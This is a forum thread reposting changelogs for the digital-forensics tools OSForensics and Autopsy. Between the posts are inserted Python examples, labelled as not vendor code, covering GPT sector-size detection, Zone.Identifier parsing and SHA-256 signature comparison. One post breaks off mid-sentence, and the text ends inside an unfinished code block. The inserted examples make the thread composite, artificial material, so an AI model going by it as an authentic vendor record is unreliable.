http://www.osforensics.com/
Titel: OSForensics 7.0.1004
Beitrag von: SiLæncer am 24 September, 2019, 09:11
Changelog


    NEW Clipboard Viewer
        Added clipboard viewer to view current, historical clipboard items (where available) and pinned items
    NEW AmCache Viewer
        Added AmCache viewer
    Auto triage
        Added option to collect clipboard contents
    Boot Virtual Machine
        Fixed unable to boot disk image located on network
        Added debug logging when querying mounted disks
    Case Manager
        Added export clipboard contents to report
        Partitions encrypted with Bitlocker now shows "Bitlocker" instead of "Empty"
    Create Index
        New indexer builds, fixed thread safety bugs with DOCX, PPTX, XLSX indexing with timing issues causing occasional "cannot open file" error on files when multiple threads are in use.
    Disk Image and Filesystem Support
        Added support for the Stream Optimized sub-format for VMDK images
        Fixed possible crash when accessing invalid cache entries for Linux EXT drives
        Added detection of sector size when reading GPT header rather than using default 512 bytes. 4K native (4Kn) sector sizes should now be detected for disk images. This resolves an issue where partitions were not being detected in some E01 images. Background info: Since about 2012 most hard drives use 4K physical sectors, but nearly universally implemented 512 byte emulation (512e). There are a tiny number of enterprise drives that are native 4K however without emulation. OSF now supports this 4Kn format.
    Deleted Files
        Fixed Crash when OSF Terminates and the background Deleted Files cache thread is still processing items.
    Prefetch Viewer (Program Artifacts)
        Renamed Prefetch Viewer on Start page to Program Artifacts and changed icon.
    Registry Viewer
        Internal viewer should now handle large LI/RI Key Types. Should help open some registry files and display previously missing keys.
        Fixed crash when decrypting Windows Passwords (Key ClassName value was incorrect)
    User Activity
        Added clipboard item collection
        Shimcache, fixed issue with Shimcache not showing details under File List tab and also when exporting to CSV, HTML, TXT.
        Added MuiCache to "Installed Programs" artifact list for non-live acq (i.e. drive images).
        Installed Programs, added programs and drivers found in AmCache.hve. (Initial support AmCache format of Windows 10 V1607 and up).
        Added right-click option to open system event viewer for event records, fixed double-click/right-click options for other activity types
        Fixed bug in MRU recent items file paths
        Support adding files from Downloads, Jump List, Recycle Bin, Shim Cache to Case
        Updates for adding items to Case and for tagging items
        Added some extra error message details if a shadow copy of a locked system file fails


http://www.osforensics.com/
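The 4Kn detection described under Disk Image and Filesystem Support above, as an added example that is not OSForensics code: instead of assuming 512-byte sectors, the primary GPT header is looked for at LBA 1 of each candidate sector size (byte 512 or byte 4096) and accepted only when its signature, size, CRC32 and current-LBA field validate. The images are constructed in memory and the disk GUID is a placeholder.

```python
"""Detect the sector size of a GPT disk image (512e vs 4Kn) from its GPT header.

Added example, not OSForensics code. build_image() constructs minimal in-memory
images; no real disk data is used.
"""
import struct
import zlib
from typing import Optional

GPT_SIGNATURE = b"EFI PART"
# UEFI GPT header layout: signature, revision, header size, header CRC32, reserved,
# current LBA, backup LBA, first usable LBA, last usable LBA, disk GUID,
# partition entry array LBA, entry count, entry size, entry array CRC32.
GPT_HEADER_FMT = "<8sIIIIQQQQ16sQIII"
GPT_HEADER_SIZE = struct.calcsize(GPT_HEADER_FMT)  # 92 bytes
CANDIDATE_SECTOR_SIZES = (512, 4096)


def header_crc(hdr: bytes, header_size: int) -> int:
    """CRC32 as the spec defines it: over header_size bytes with the CRC field zeroed."""
    zeroed = hdr[:16] + b"\x00\x00\x00\x00" + hdr[20:header_size]
    return zlib.crc32(zeroed) & 0xFFFFFFFF


def build_gpt_header(sector_size: int, total_sectors: int,
                     num_entries: int = 128, entry_size: int = 128) -> bytes:
    """Pack a valid primary GPT header for LBA 1 with an all-zero entry array."""
    entry_bytes = num_entries * entry_size
    entry_sectors = -(-entry_bytes // sector_size)  # ceiling division
    fields = [
        GPT_SIGNATURE, 0x00010000, GPT_HEADER_SIZE, 0, 0,
        1,                                  # current LBA: primary header is at LBA 1
        total_sectors - 1,                  # backup header at the last LBA
        2 + entry_sectors,                  # first usable LBA
        total_sectors - 2 - entry_sectors,  # last usable LBA
        b"\x11" * 16,                       # placeholder disk GUID (constructed)
        2, num_entries, entry_size,
        zlib.crc32(bytes(entry_bytes)) & 0xFFFFFFFF,
    ]
    packed = struct.pack(GPT_HEADER_FMT, *fields)
    fields[3] = header_crc(packed, GPT_HEADER_SIZE)
    return struct.pack(GPT_HEADER_FMT, *fields)


def build_image(sector_size: int, total_sectors: int = 128) -> bytearray:
    """Constructed image: protective-MBR signature in sector 0, GPT header in LBA 1."""
    image = bytearray(sector_size * total_sectors)
    image[510:512] = b"\x55\xAA"  # MBR signature sits at byte 510 whatever the sector size
    hdr = build_gpt_header(sector_size, total_sectors)
    image[sector_size:sector_size + len(hdr)] = hdr
    return image


def detect_gpt_sector_size(image: bytes) -> Optional[int]:
    """Return 512 or 4096 depending on where a *valid* GPT header is found.

    LBA 1 of a 4Kn disk starts at byte 4096, so each candidate size is tried.
    A header is accepted only if the signature, header size, CRC32 and
    current-LBA field all check out, so a stray "EFI PART" string elsewhere
    in the image is not mistaken for a header.
    """
    for sector_size in CANDIDATE_SECTOR_SIZES:
        off = sector_size
        hdr = bytes(image[off:off + GPT_HEADER_SIZE])
        if len(hdr) < GPT_HEADER_SIZE or hdr[:8] != GPT_SIGNATURE:
            continue
        _, _, header_size, crc, _, current_lba = struct.unpack(GPT_HEADER_FMT, hdr)[:6]
        if not GPT_HEADER_SIZE <= header_size <= sector_size:
            continue
        full = bytes(image[off:off + header_size])
        if len(full) < header_size or header_crc(full, header_size) != crc:
            continue
        if current_lba != 1:
            continue
        return sector_size
    return None  # no valid GPT header: fall back to MBR handling


if __name__ == "__main__":
    for size in CANDIDATE_SECTOR_SIZES:
        print(size, "->", detect_gpt_sector_size(build_image(size)))
```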
Titel: OSForensics 7.0.1005
Beitrag von: SiLæncer am 10 Oktober, 2019, 12:16
Changelog

    Boot VM:

    Added option to select disk controller. If "Auto" is selected, IDE is used for Windows XP and SATA otherwise. Should improve performance for non-XP images.

    Disk Image and Filesystem Support:

    Initial support for ISO images.

    ESEDB Viewer:

    Added detection of MAPI property hex in column header. If so, display the property identifier string
    Highlight known tables and display default columns for Win 10 Mail store.vol

    Memory Viewer:

    Added checkboxes to list of processes
    Added export of checked process details to CSV & case
    Added export of list of checked process to CSV & case
    Added link displaying number of checked processes
    Fixed task activity LED not clearing after dumping process memory
    Added right-click menu for checked items
    Export checked processes memory dump to disk & case
    Added right-click menu option to dump checked process memory into single file

    Mismatch Search:

    Fixed "Identified Type" column header displaying as "Location"

    Registry Viewer:

    Initial implementation of exporting SAM/SOFTWARE registry hive reports
    Initial implementation of exporting SYSTEM/NTUSER.dat registry hive reports

    Start Window:

    Fixed icon groups re-ordering when changing workflow

    User activity:

    CSV export of checked items. Behaviour now matches export to text/html where if the ALL items view is currently selected it will export all checked items, but when viewing a specific item type only checked items of that item type are exported.
    CSV export, fixed a bug preventing the recycle bin items from being exported correctly.
    Fixed an issue with the column sorting when sorting by integer value (eg filesize) for Recycle bin, event, jumplist and shim cache items.

    $UsnJrnl viewer:

    Changed to detection of MFT record size rather than using hardcoded 1024 bytes
    Added additional debug logging when scanning MFT records


http://www.osforensics.com/
Titel: Autopsy 4.13.0
Beitrag von: SiLæncer am 15 Oktober, 2019, 12:00
Changelog

    General:

    Switch from Oracle JDK to OpenJDK.
    Full command line support (case creation, adding of data sources, running ingest, and generating reports).

    Logical Imager:

    Output can be individual files instead of VHD image (uses less space).
    More fine grained progress during collection and importing.
    Log of files and make artifacts.
    All console messages are saved to a log file too.
    Improved handling of cancellation when adding results into a case.

    Ingest Modules:

    Added Android support as Python modules for: Android installed apps, Android browser, Facebook Messenger, IMO, LINE, Opera, ORUX Maps, Samsung SBrowser, Skype, ShareIt, TextNow, Viber, WhatsApp, Xender, Zapya.
    Recycle Bin files are parsed in Recent Activity module, new artifacts are created, and deleted file entries are created at the original location of the deleted files. Code is based on Mark McKinnon’s RecycleBin module (https://github.com/markmckinnon/Autopsy-Plugins/tree/master/Recycle_Bin).
    ShellBag registry data is extracted from RegRipper in the Recent Activity module. New artifacts are recreated for the data. Based on Mark McKinnon’s “Parse ShellBags” module (https://github.com/markmckinnon/Autopsy-Plugins/tree/master/Parse_Shellbags).
    Additional data is extracted about users from SAM hive in Recent Activity module. Data includes password dates, permissions, groups, and full name. Based on Mark McKinnon’s “Parse SAM” module (https://github.com/markmckinnon/Autopsy-Plugins/tree/master/Parse_SAM).
    Email ingest module parses EML files. Based on Mark McKinnon’s “EML Parser” module (https://github.com/markmckinnon/Autopsy-Plugins/tree/master/EML_Parser).
    Fixed bug in MBOX module that caused attachments to have a “_” in the name.
    New Plaso ingest module that runs Plaso and generates events for the timeline.
    Fixed bug in Email module for VCard files to better parse phone number types.
    Keyword Search module waits longer for Solr to start to prevent incorrectly reporting a problem and disabling the feature.
    Embedded file extractor module was updated to not report compression bombs for GZIP files.

    Timeline:

    New approach for storing event data. A dedicated events table exists and is populated as files and artifacts are added to the database. No longer requires an explicit step of populating a local events table.
    Users can create their own events from the Timeline UI.
    Filtering was simplified based on existence of tag or hash set hit versus a specific name.
    Communications:

    Fixed bug that hid contact book entries with duplicate numbers.

    Image Gallery:

    Fixed bug in schema that caused errors with very long file names.

    Report:

    CASE report is included in a portable case.
    Image tags are included in portable case.
    More size options for a packaged portable case.
    New Infrastructure to support command line-based generation.

    Backend:

    Developers should use the new Blackboard.postArtifact() method to ensure artifact is indexed and added to the timeline.
    New classes were created to make it easier to write modules for apps.


http://www.sleuthkit.org/autopsy
Titel: OSForensics 7.1.1000
Beitrag von: SiLæncer am 19 November, 2019, 12:26
Changelog

    NEW Event Log Viewer:

    New viewer to display windows event log files. Open logs in E01 images, filter logs, add log entries to the case, etc..

    Android Logical Copy:

    At completion, log will show the count of files copied by file extension.

    Case Manager:

    Fixed empty partitions being displayed in drop down list when adding physical drives to case
    Minor fix for BitLocker encrypted volume detection

    Clipboard viewer:

    Added some checks when ComBase.dll functions are being called that they exist to prevent a possible crash in Win7 when attempting to collect extended clipboard data

    Create/Search Index:

    New indexer build that adds XFS file system support
    Updated indexer fixed bug with search results from email attachments of ZIP files appearing under the Files tab instead of Email attachments
    Added 'Export Search Results to CSV' feature on the 'History' tab, which allows user to export results from multiple search queries and multiple indexes at once.

    Debug mode - (Start Window):

    Added 'Restart OSF in Debug Mode' icon under 'Housekeeping' to restart OSF with 'DEBUGMODE' parameter set

    ESEDB Viewer:

    Updated libesedb library to libesedb-20181229
    Fixed major performance issue with very large ESEDB files (4GB+). Achieved roughly 40x speed improvement. Previously large files would be so slow to process that User Activity module looked like it had locked up. This should resolve this issue

    File system support:

    Added support for Linux XFS file system

    Logical Imaging:

    Fixed bug where root paths added from "Other Available Devices" were not being copied.

    Registry Viewer:

    Added right-click menu for exporting report to disk/case

    User activity:

    Added a new option in the config "Moved Downloads (Slow)" to control whether the drive is scanned for downloads that have been moved (Zone.Identifier streams); this is now off by default as it can be a slow process
    Replaced Jetblue API use with ESEDB library (libesedb) use when getting EDGE/IE10 history
    Added some more status messages for registry and browser processes
    Fixed sorting of columns for SRUM DB information

    Misc:

    Physical drive scanning for partitions at startup was updated so that OSF startup speed should be quicker and use less RAM.
    Fixed a bug in the disk partition detection code, it was not thread safe when running in debug mode, which could result in a rare crash at startup
    Help file updates

http://www.osforensics.com/
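The "Moved Downloads" option in the changelog above relies on the Zone.Identifier alternate data stream (the "mark of the web") that Windows attaches to downloaded files and that survives a move to another folder on the same volume. As an added example, not OSForensics code and nothing from PassMark, the Python below parses the contents of that stream and, on a live Windows volume, walks a tree to find the files carrying it; the sample streams and the URLs inside them are constructed placeholders.

```python
"""Recover download provenance from NTFS Zone.Identifier streams.

Added example, not OSForensics code.  The stream holds an INI-style block:

    [ZoneTransfer]
    ZoneId=3
    ReferrerUrl=https://example.test/page
    HostUrl=https://cdn.example.test/tool.exe

ZoneId follows the Internet Explorer security zones (3 = Internet).  The
sample streams at the bottom are constructed.
"""
import os
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

STREAM_NAME = ":Zone.Identifier"
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}


@dataclass
class ZoneInfo:
    zone_id: Optional[int]
    referrer_url: Optional[str]
    host_url: Optional[str]

    @property
    def zone_name(self) -> str:
        return ZONE_NAMES.get(self.zone_id, "Unknown")

    @property
    def from_internet(self) -> bool:
        # Zones 3 and 4 are the ones SmartScreen and Office Protected View act on.
        return self.zone_id in (3, 4)


def parse_zone_identifier(data: bytes) -> Optional[ZoneInfo]:
    """Parse the bytes of a Zone.Identifier stream; None if there is no [ZoneTransfer] section."""
    text = data.decode("utf-8", errors="replace").lstrip("\ufeff")   # tolerate a UTF-8 BOM
    section_seen = False
    in_section = False
    fields: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "zonetransfer"
            section_seen = section_seen or in_section
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    if not section_seen:
        return None
    raw_id = fields.get("zoneid")
    zone_id = int(raw_id) if raw_id is not None and raw_id.isdigit() else None
    return ZoneInfo(zone_id, fields.get("referrerurl"), fields.get("hosturl"))


def scan_for_downloads(root: str) -> List[Tuple[str, ZoneInfo]]:
    """Walk a live NTFS tree and return (path, ZoneInfo) for every file carrying the stream.

    Opening 'file:Zone.Identifier' only works on Windows; elsewhere the function
    returns an empty list rather than silently mis-reporting.
    """
    hits: List[Tuple[str, ZoneInfo]] = []
    if os.name != "nt":
        return hits
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path + STREAM_NAME, "rb") as stream:
                    info = parse_zone_identifier(stream.read(4096))
            except OSError:          # no such stream, or no permission
                continue
            if info is not None:
                hits.append((path, info))
    return hits


# Constructed samples: a browser download, a minimal stream with a BOM, and a non-stream.
SAMPLE_BROWSER = (b"[ZoneTransfer]\r\nZoneId=3\r\n"
                  b"ReferrerUrl=https://example.test/downloads\r\n"
                  b"HostUrl=https://cdn.example.test/tool.exe\r\n")
SAMPLE_MINIMAL = b"\xef\xbb\xbf[ZoneTransfer]\r\nZoneId=3\r\n"
SAMPLE_NOT_MOTW = b"just some file content\n"

if __name__ == "__main__":
    for label, blob in (("browser", SAMPLE_BROWSER), ("minimal", SAMPLE_MINIMAL), ("plain", SAMPLE_NOT_MOTW)):
        info = parse_zone_identifier(blob)
        print(label, "->", "no Zone.Identifier" if info is None
              else f"{info.zone_name}: {info.host_url or '(no URL recorded)'}")
```

On a mounted image the same parser can be pointed at the stream bytes exported by any tool that exposes alternate data streams; note that a file copied to a FAT/exFAT volume loses the stream, so absence does not prove the file was never downloaded.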
Titel: OSForensics 7.1.1001
Beitrag von: SiLæncer am 02 Dezember, 2019, 12:27
Changelog

Create / Search Index:

Fixed bug with Custom limit for Max File Size and Max Pages not applying when creating an index
Added ability to "Display Search Results" for multiple selected items in the "History" tab
Added "Path hash" column for "Export Search Results to CSV" to locate files that have been added to case (and stored in the "Files" folder)

Disk Imaging:

Read/Write/Hash threads now use their own I/O buffers to prevent memory access errors when a disk timeout occurs. This typically only happens when disk has a hardware fault. But it could result in a crash when it does happen.

ESEDB Viewer:

Fixed possible crash when loading a table in the ESEDB viewer

Event Log Viewer:

Reorganized elements in the main dialog and top menu.
Updated filter options in the Advanced Filter.
Added tree-view right-click menu.
Added Presets combo box for quick filtering. The user can also add their own preset filters by editing the text file, ProgramData\PassMark\OSForensics\EventLogPresets.txt
Updated list-view item selection to allow multiple item selection using mouse drag and right click menu Toggle Check to select them.

Internal viewer:

Metadata, Improved UI responsiveness by launching metadata collection process in a separate thread.
Fixed bug in loading NTFS alternate streams when there is no file list

Raw disk viewer:

Added file system scanning for Linux XFS disks. XFS files, directories, and internal structures should be identified and highlighted.
Fixed bug in partition size for XFS disks

User Activity:

Allowed tagging of activity items that are not file paths (eg. registry keys, URLs, DB records, etc.)
Added an option in the list-view right-click menu for Event Log to allow users to open Event Log Viewer and locate the selected event.
Added 'Flags' column to identify 'tagged' items
Fixed Ctrl+T shortcut not working
Fixed memory allocation error due to invalid jump list entries
Fixed Web Browser tab not being highlighted when opening URL
Improved options to export to CSV and copy to clipboard from SRUM Database entries
http://www.osforensics.com/
Titel: OSForensics 7.1.1002
Beitrag von: SiLæncer am 06 Dezember, 2019, 12:24
Changelog

    Android Logical Copy:

    Fixed possible crash due to corrupted stack

    Event Log Viewer:

    Added Scan Folder button, this allows multiple event logs to be added to the viewer even when the event logs are found in a non-standard folder
    Added ability to add and delete multiple drives and folders in tree-view. Previously only files from one drive at a time could be added.
    Changed presets filtering configuration file, allowing more complicated filter conditions. Also added some additional preset filters
    Added a must "Not Contain" option to the event log filter conditions.

    User Activity:

    Results can now be sorted by tagged state by clicking on the "Flags" column
    Fixed crash when sorting by column that we accidentally introduced in last patch, oops.
    Added filtering of results by "Flags"
    USB, Opening USB device entries obtained from setupapi.dev.log or event log now opens the correct viewer
    WLAN, Opening WLAN entries obtained from .xml file now opens the correct viewer
    Fixed right-click menu for USB/WLAN activity
    Fixed a crash that could occur if a scanned ESEDB database was corrupt. Seems to be rare as we have only

http://www.osforensics.com/
Titel: OSForensics 7.1.1003
Beitrag von: SiLæncer am 17 Dezember, 2019, 06:00
Changelog

    Create Index/Search Index
        Fixed bugs with indexing and searching large indexes containing more than 2million unique words. Also improved error reporting.
        Indexer now reports number of threads in log
        Added debug mode for OSFIndexer
    File System Browser
        Fixed jumping to disk offset when selected disk in raw disk viewer does not match
    Logical Imaging
        Fixed copying sparse files, which were not being set as sparse on destination (if filesystem supports it)
    Raw disk viewer
        Support for jumping to XFS inode record
        Support for jumping to ext[2|3|4] inode record
        Added file system scanning for APFS disks. APFS files should be identified and highlighted.
        Added jump to APFS file offset
    SQLite Viewer
        Fixed "begins with" and "end with" query strings generating reversed queries
    Start Window
        Added "Check for Updates" icon under "Help and Information" for checking the most up-to-date OSF version
    User Activity
        Warn user if contents copied to clipboard exceeded limit and will be truncated.
    Misc
        Fixed disk dropdown box incorrectly display "Unknown/Empty partition" for all case devices

http://www.osforensics.com/
Titel: OSForensics 7.1.1004
Beitrag von: SiLæncer am 06 Januar, 2020, 09:08
Changelog

    Create Index/Search Index:

    Further fixes to indexing and searching large number of unique words (2mill+)
    Fixed bug with files that failed to be identified by magic being indexed as plain text (now treated as binary files). This may have caused extraneous data to be indexed (leading to a large number of unique words)
    Fixed bug with "Export search results to CSV" from "Search Index"->"History" tab, when the selected search results contain a mix of files and emails, the columns output in the CSV do not match up (emails will have more columns than the files).

    Email Viewer:

    Fixed bug with Email Viewer refusing to open an MBOX file which contains non-ASCII characters, so that the file was opened in the Internal File Viewer instead.

    ESEDB Viewer:

    Added missing error checks for non-existent table name. This caused out-of-index exception when performing User Activity scan on IE/Edge WebCache01.dat files.

    Passwords:

    Potential fix for crash when scanning for passwords in Credential Manager


http://www.osforensics.com/
Titel: OSForensics 7.1.1005
Beitrag von: SiLæncer am 24 Januar, 2020, 18:00
Changelog


    Case Manager
        Added support for opening tagged e-mails & attachments via double-click/right-click
    Create Index/Search Index
        Fixed bug when selecting file types for "Video", "Executables" or "Other" only (no files indexed when these are the only options selected)
        Fixed crash bug with indexing and extracting meta info for MP3 files containing TXXX frames
        Fixed bug with indexing files found within at least 3 recursive levels of ZIP files. These would show up with incorrect paths (missing ZIP file names) and unable to open the file from the Search Results
        Fixed bug with email messages in HTML or TXT format (not RTF) not being indexed as email filetype (and incorrectly showing up on the "Files" tab in OSF results)
        Fixed bug with MBOX files with no extensions (such as from Thunderbird) being indexed twice when we encounter the .MSF (mbox index) file.
        Fixed bug with MBOX files with no extensions failing to be recognised by the unknown file type identification function (magic).
        Updated PDF indexing to use CreationDate and ModDate from within PDF document properties
    File Name Search
        Presets, Updated default extensions to include heic/heif for images and hevc for videos.
    Generate Report
        Fixed Typos. Custom Logo area is always shown. Still only editable in Pro version.
    Start Page
        Fixed issue where some items were not being hidden when everything was unchecked in Customize Workflow.
    System Information
        Added collection of more fields when performing command ('Windows Info (Registry)'). Fixed collection of 'Install date' field.
    Misc
        Updated web browser video download function to work with current version of YouTube
        Added code to deal with non sector aligned access to physical disk
        Updated support bitlocker encryption. This can fix (some) instances of the "unsupported FVE metadata entry version" error.

http://www.osforensics.com/
Titel: Autopsy 4.14.0
Beitrag von: SiLæncer am 25 Januar, 2020, 19:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

    Specialized UIs:

    New File Discovery UI that allows you to search and filter for certain types of files. Works best with the Central Repository storing all of the hashes you've seen.
    New Map viewer that uses either Bing (when online) or offline map tiles.
    Communications UI shows country names for phone numbers and fixed bug in summary panel.
    Fixed bugs in timeline filtering.
    Refactored backend timeline filtering code based on The Sleuth Kit data model changes to remove JavaFX dependency.

    Data Sources:

    Added limited support for APFS disk images. Does not include encrypted volumes or ones that span multiple disks. Uses contribution to The Sleuth Kit from Black Bag Technologies.
    New data source processor that parses “XRY File Exports”.

    Content Viewers:

    Added a new “Context” viewer to show where a file came from. Currently shows what message a file was attached to or what URL a file was downloaded from.
    Added support to seek and change playback speed for videos in “Application” viewer.
    Improved support for Unicode HTML files in “Application” viewer.
    Added support for webp image files in “Application” viewer.

    Ingest Modules:

    Keyword Search module uses Decodetect statistical encoding detection for plain text files. Fixes issues with incorrect detection of Japanese files.
    Embedded File Extractor module uses statistical analysis to determine encoding of file names in ZIP files. Fixes issues with ZIP files created on Windows Japanese computers.
    Solr (Keyword Search module) now uses Japanese-specific tokenization using Kuromoji.
    Fixed Shellbags module in RegRipper (used by Autopsy Recent Activity module) to fix parsing errors.
    Plaso module no longer generates an error if enabled for non-disk image data sources.
    Added support for message attachments that are stored as an external file system file. Expanded Email and Android modules to use this technique.

    General:

    Fixed crashes by gstreamer when a video is selected.
    Added initial capability to delete a data source from a case (excludes data in the CR).
    Changed behavior of portable case menu item to automatically open the case and warn if it was already unpacked.
    Fixed bug that caused issues when case metadata had Unicode values.
    Added new Attachment APIs to the CommunicationsArtifactHelper class to support attachments stored as external file system files.

http://www.sleuthkit.org/autopsy
Titel: OSForensics 7.1.1006
Beitrag von: SiLæncer am 18 Februar, 2020, 14:00
Changelog

    Auto Triage:

    Fixed a crash that could occur when collecting system information (via Auto Triage or System Information)
    Made some changes so less trial limitation warnings are displayed at the same time during Auto Triage

    Create Index:

    New indexer builds with updated BitLocker handling

    Generate Report:

    Fixed an issue with Logos not being enabled to be changed for Pro/Licensed.

    Passwords:

    Updated Password Decrypting .dll files and fixed issue with GPU decryption not running.

    User Activity:

    Export to CSV. Removed Flags field from CSV output, which was causing a column shift for some MRU types. Note: Flag values are case specific and their values were never exported, but the column header for "Flags" was.
    Fixed shifted/misaligned column issue when exporting Event data to CSV.

    Web Browser:

    Fixed an issue where saving a webpage as web archive (.MHT) was no longer working.

http://www.osforensics.com/
Titel: OSForensics 7.1.1007
Beitrag von: SiLæncer am 05 März, 2020, 18:00
Changelog

    AmCache Viewer:

    Improved performance of reading amcache hive

    Create/Compare Signature:

    Added support for SHA-256 hashes. This required changing the signature file format and incrementing the signature file version from 6 -> 7.
    Add support for comparing previous signature file version with v7 signature file

    Create Index:

    Added "Memory dump files" file type option
    Added Email Attachment indexing options ("index attachments by file types")
    Updated indexer with chunked large binary file indexing, and progress indication
    New indexer builds with large file support for .mem, .dmp, .mdmp (large file support does not apply if inside ZIP files)
    New indexer builds with crash bug fixes

    Deleted Files:

    Internal changes to get sector size

    Forensic Imaging:

    Added option to select between single/split files when creating Encase image files

    Passwords:

    Improved performance of retrieving registry passwords
    Fixed various memory leak issues
    Fix heap corruption when retrieving LSA secrets
    Improved performance of reading Firefox logins from registry
    Improved performance of reading IE logins from registry
    Improved performance of reading Outlook/Windows Live logins from registry

    Registry:

    Added new registry function to read a single key in a hive for better performance without loading the entire registry file

    Scripting:

    Improved performance of RegistryGetSubKeys() and RegistryGetKeyValues() methods for reading registry keys

    System Information:

    Improved performance of registry commands

http://www.osforensics.com/
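The Create/Compare Signature entries above add SHA-256 to the drive signatures that OSForensics compares between two points in time. The Python below is an added example, not OSForensics code and not its signature file format: it snapshots a tree as (relative path, size, SHA-256), diffs two snapshots into added/removed/modified files, and round-trips a snapshot through a small JSON layout of my own that records which hash algorithm was used. The baseline and later trees are constructed in memory so the example runs without touching a disk.

```python
"""Create and compare drive signatures with SHA-256.

Added example, not OSForensics code.  SHA-256 rather than MD5/SHA-1 because
collisions for those are practical, so a modified file could otherwise be
crafted to keep its old digest and vanish from the 'modified' list.
"""
import hashlib
import json
import os
from dataclasses import dataclass
from typing import Dict, Iterable, List

CHUNK = 1 << 20        # hash files in 1 MiB pieces so large images do not load into RAM


@dataclass(frozen=True)
class FileSig:
    size: int
    sha256: str


Signature = Dict[str, FileSig]      # relative path with '/' separators -> FileSig


def sha256_of_stream(chunks: Iterable[bytes]) -> str:
    h = hashlib.sha256()
    for chunk in chunks:
        h.update(chunk)
    return h.hexdigest()


def _file_chunks(path: str) -> Iterable[bytes]:
    with open(path, "rb") as f:
        while True:
            chunk = f.read(CHUNK)
            if not chunk:
                return
            yield chunk


def create_signature(root: str) -> Signature:
    """Hash every regular file under root; symlinks are skipped, not followed."""
    sig: Signature = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        filenames.sort()                       # deterministic order between runs
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            sig[rel] = FileSig(os.path.getsize(path), sha256_of_stream(_file_chunks(path)))
    return sig


def signature_from_bytes(files: Dict[str, bytes]) -> Signature:
    """Same record shape built from an in-memory {relpath: content} map (for the sample)."""
    return {p: FileSig(len(b), sha256_of_stream([b])) for p, b in files.items()}


@dataclass
class SignatureDiff:
    added: List[str]
    removed: List[str]
    modified: List[str]        # same path, different digest
    unchanged: int


def compare_signatures(old: Signature, new: Signature) -> SignatureDiff:
    common = old.keys() & new.keys()
    modified = sorted(p for p in common if old[p].sha256 != new[p].sha256)
    return SignatureDiff(sorted(new.keys() - old.keys()),
                         sorted(old.keys() - new.keys()),
                         modified, len(common) - len(modified))


def dump_signature(sig: Signature) -> str:
    """JSON form (own layout, not OSForensics'); names the algorithm so a reader can refuse unknown ones."""
    return json.dumps({"algorithm": "sha256",
                       "files": {p: [s.size, s.sha256] for p, s in sorted(sig.items())}}, indent=1)


def load_signature(text: str) -> Signature:
    doc = json.loads(text)
    if doc.get("algorithm") != "sha256":
        raise ValueError(f"unsupported signature algorithm {doc.get('algorithm')!r}")
    return {p: FileSig(size, digest) for p, (size, digest) in doc["files"].items()}


# Constructed sample: a baseline tree and the same tree after an incident.
BASELINE = {
    "Windows/System32/drivers/etc/hosts": b"127.0.0.1 localhost\n",
    "Users/alice/Documents/notes.txt": b"quarterly numbers\n",
    "Program Files/Tool/tool.exe": b"MZ\x90\x00original",
}
LATER = {
    "Windows/System32/drivers/etc/hosts": b"127.0.0.1 localhost\n0.0.0.0 update.vendor.test\n",
    "Users/alice/Documents/notes.txt": b"quarterly numbers\n",
    "Users/alice/AppData/Roaming/svchost.exe": b"MZ\x90\x00dropped",
}

if __name__ == "__main__":
    diff = compare_signatures(signature_from_bytes(BASELINE), signature_from_bytes(LATER))
    print("added:   ", diff.added)
    print("removed: ", diff.removed)
    print("modified:", diff.modified)
```

For a real comparison call create_signature() on the mounted baseline and on the mounted evidence volume and feed both to compare_signatures(); timestamps are deliberately left out of the record so that a touch without a content change does not show up as modified.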
Titel: OSForensics 7.1.1008
Beitrag von: SiLæncer am 17 März, 2020, 11:00
Changelog

    Fixed crash bugs while indexing large Bitlocker images
    Fixed 'Skipping directory ...' log messages
    Changed handling of $ system files e.g. $AttrDef, $Bitmap, $boot, $LogFile, $MFTMirr, $Secure, $UpCase and $Volume are now only treated as filename index only. Only $MFT and $RECYCLE.BIN are binary extracted.
    RAM drive now allocates 2GB if >16GB of ram is available
    Added error messages for caching files and temp files.
    Updated PDF indexing to only use OCR when text layer is insufficient (avoid excessive OCR'ing files)

http://www.osforensics.com/
Titel: OSForensics 7.1.1009
Beitrag von: SiLæncer am 24 März, 2020, 11:00
Changelog

    Create Index:

    Fixed crash bug when multi-threaded indexing and extracting text from system binary files and non-system binary files

    Password Recovery:

    Added a dialog to allow individual partition selection when trying to run on a disk image mounted as the entire disk that contains multiple partitions
    Fixed a potential crash that could occur when recovering passwords (mostly affecting chrome passwords)

    Registry Viewer:

    Made some changes to work better with disk images mounted as the entire disk that contains multiple partitions, will now scan multiple partitions for known registry files

    User Activity:

    Added a dialog to allow individual partition selection when trying to run user activity on a disk image mounted as the entire disk that contains multiple partitions

http://www.osforensics.com/
Titel: OSForensics 7.1.1010
Beitrag von: SiLæncer am 25 März, 2020, 11:00
Changelog

    Auto triage / User activity:

    Fixed a crash that could occur when running user activity (or auto triage) using the live acquisition option

    Deleted Files:

    NTFS, Reading $ATTRIBUTE_LIST now uses a dynamic-sized buffer rather than a fixed-sized buffer. This may fix buffer overflow issues when scanning MFT
    NTFS, Added more verbose output when scanning $MFT attributes

http://www.osforensics.com/
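The $ATTRIBUTE_LIST fix in the changelog above is the classic fixed-buffer problem: the entry length and name fields come from the disk, and a corrupt (or crafted) value larger than the buffer reserved for it reads or writes past the end. As an added example, not OSForensics code, the Python below parses an $ATTRIBUTE_LIST body with every on-disk length and offset checked against the bytes actually present, and shows two constructed corrupt lists being rejected. The entry layout follows the public NTFS documentation (Linux-NTFS, The Sleuth Kit); the MFT record numbers in the samples are invented.

```python
"""Bounds-checked parser for the body of an NTFS $ATTRIBUTE_LIST attribute.

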